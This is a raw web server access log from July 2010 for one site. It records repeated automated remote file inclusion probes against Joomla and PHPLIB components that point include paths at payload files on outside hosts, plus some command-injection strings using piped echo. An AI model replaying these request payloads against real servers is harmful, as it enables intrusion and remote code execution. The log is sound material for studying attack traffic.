91.206.218.32 - - [26/Jul/2010:08:24:02 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:08:24:08 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:08:24:08 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:08:24:08 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.195 - - [26/Jul/2010:08:24:09 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
91.206.218.32 - - [26/Jul/2010:08:26:17 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:08:26:17 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:08:26:17 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:08:26:32 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:08:26:32 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:08:26:32 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:08:30:00 -0700] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:08:30:00 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:08:30:01 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
93.158.149.32 - - [26/Jul/2010:08:35:30 -0700] "GET /logs/access_100510.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:08:39:09 -0700] "GET /logs/access_100614.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:08:39:09 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.222.34.35 - - [26/Jul/2010:08:39:09 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:08:39:23 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:08:39:23 -0700] "GET /logs/access_100614.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
91.206.218.32 - - [26/Jul/2010:08:39:23 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.votrepharma.com/images/smilies/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.107 - - [26/Jul/2010:08:42:24 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
216.18.213.162 - - [26/Jul/2010:08:47:53 -0700] "GET /logs/access_100621.log HTTP/1.1" 200 483276 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
114.108.176.9 - - [26/Jul/2010:08:54:21 -0700] "GET /logs/access.log%20%20//index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
114.108.176.9 - - [26/Jul/2010:08:54:21 -0700] "GET /index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
114.108.176.9 - - [26/Jul/2010:08:54:22 -0700] "GET /logs//index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
114.108.176.9 - - [26/Jul/2010:08:55:37 -0700] "GET /index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
114.108.176.9 - - [26/Jul/2010:08:55:37 -0700] "GET /logs/access.log%20%20//index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
114.108.176.9 - - [26/Jul/2010:08:55:37 -0700] "GET /logs//index.php?mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.105 - - [26/Jul/2010:09:09:44 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
117.53.96.161 - - [26/Jul/2010:09:20:03 -0700] "HEAD / HTTP/1.0" 200 0 "http://redneckmba.com" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "redneckmba.com"
174.123.133.162 - - [26/Jul/2010:09:23:22 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "redneckmba.com"
174.123.133.162 - - [26/Jul/2010:09:23:22 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "redneckmba.com"
174.123.133.162 - - [26/Jul/2010:09:23:24 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "redneckmba.com"
174.123.133.162 - - [26/Jul/2010:09:23:24 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "redneckmba.com"
174.123.133.162 - - [26/Jul/2010:09:24:09 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "redneckmba.com"
174.123.133.162 - - [26/Jul/2010:09:24:09 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "redneckmba.com"
66.163.171.205 - - [26/Jul/2010:09:25:03 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
174.123.133.162 - - [26/Jul/2010:09:27:08 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
174.123.133.162 - - [26/Jul/2010:09:27:29 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
174.123.133.162 - - [26/Jul/2010:09:27:30 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
114.108.151.149 - - [26/Jul/2010:09:28:34 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.badmintonyukon.ca/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
114.108.151.149 - - [26/Jul/2010:09:28:35 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.badmintonyukon.ca/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
114.108.151.149 - - [26/Jul/2010:09:29:23 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.badmintonyukon.ca/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
114.108.151.149 - - [26/Jul/2010:09:29:24 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.badmintonyukon.ca/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
74.53.98.146 - - [26/Jul/2010:09:34:47 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.mymw.info//ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
76.13.114.107 - - [26/Jul/2010:09:37:09 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
188.165.217.175 - - [26/Jul/2010:09:37:35 -0700] "GET //?_PHPLIB[libdir]=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:09:37:35 -0700] "GET /logs///?_PHPLIB[libdir]=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 200 2088 "-" "Mozilla/5.0" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:09:37:35 -0700] "GET /logs/access.log%20%20///?_PHPLIB[libdir]=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:09:37:40 -0700] "GET /logs/access.log%20%20///?_PHPLIB[libdir]=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:09:37:40 -0700] "GET //?_PHPLIB[libdir]=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:09:37:40 -0700] "GET /logs///?_PHPLIB[libdir]=http://www.talkpic.com/bbs/icon/private_name/id1.txt?? HTTP/1.1" 200 2088 "-" "Mozilla/5.0" "www.redneckmba.com"
74.53.98.146 - - [26/Jul/2010:09:39:33 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.mymw.info//ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
74.53.98.146 - - [26/Jul/2010:09:39:33 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.mymw.info//ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
74.53.98.146 - - [26/Jul/2010:09:39:33 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.mymw.info//ID.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
174.123.133.162 - - [26/Jul/2010:09:47:03 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
174.123.133.162 - - [26/Jul/2010:09:47:04 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
174.123.133.162 - - [26/Jul/2010:09:47:04 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:09:48:00 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:09:48:00 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:09:48:00 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:09:48:01 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:09:48:01 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:09:48:01 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
174.123.133.162 - - [26/Jul/2010:09:48:13 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
174.123.133.162 - - [26/Jul/2010:09:48:13 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
174.123.133.162 - - [26/Jul/2010:09:48:13 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
174.123.133.162 - - [26/Jul/2010:09:48:25 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
174.123.133.162 - - [26/Jul/2010:09:48:25 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
174.123.133.162 - - [26/Jul/2010:09:48:25 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.domeinonline.com/images/stories/food/myid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
76.13.123.194 - - [26/Jul/2010:09:48:57 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
216.129.119.47 - - [26/Jul/2010:09:51:40 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "redneckmba.com"
211.202.2.34 - - [26/Jul/2010:09:52:37 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:09:52:37 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:09:52:37 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:09:52:37 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:09:52:37 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:09:52:38 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:03:50 -0700] "GET /logs/access_100614.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:03:51 -0700] "GET /logs/access_100614.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:04:30 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:04:31 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:04:31 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:04:31 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:04:31 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:04:31 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:05:01 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:05:01 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:05:01 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
76.13.114.105 - - [26/Jul/2010:10:05:01 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:05:01 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:05:01 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:05:01 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:08:44 -0700] "GET /logs/access_100614.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:08:45 -0700] "GET /logs/access_100614.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:10:00 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:10:00 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:10:00 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:10:00 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:10:00 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:10:00 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:12:23 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:12:23 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:12:23 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:12:24 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:12:24 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:12:24 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=%7Cecho%20%22stealth%22;echo%20%22solo%22;%7C HTTP/1.1" 404 - "-" "stealth solo" "redneckmba.com"
79.87.14.150 - - [26/Jul/2010:10:14:28 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://wang.es/c100.txt? HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)" "redneckmba.com"
79.87.14.150 - - [26/Jul/2010:10:14:43 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://wang.es/c100.txt? HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)" "www.redneckmba.com"
211.202.2.34 - - [26/Jul/2010:10:15:35 -0700] "GET /logs/access_100621.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://elimmission.or.kr//bbs//skin/1.txt?? HTTP/1.1" 404 - "-" "stealth solo" "redneckmba.com"
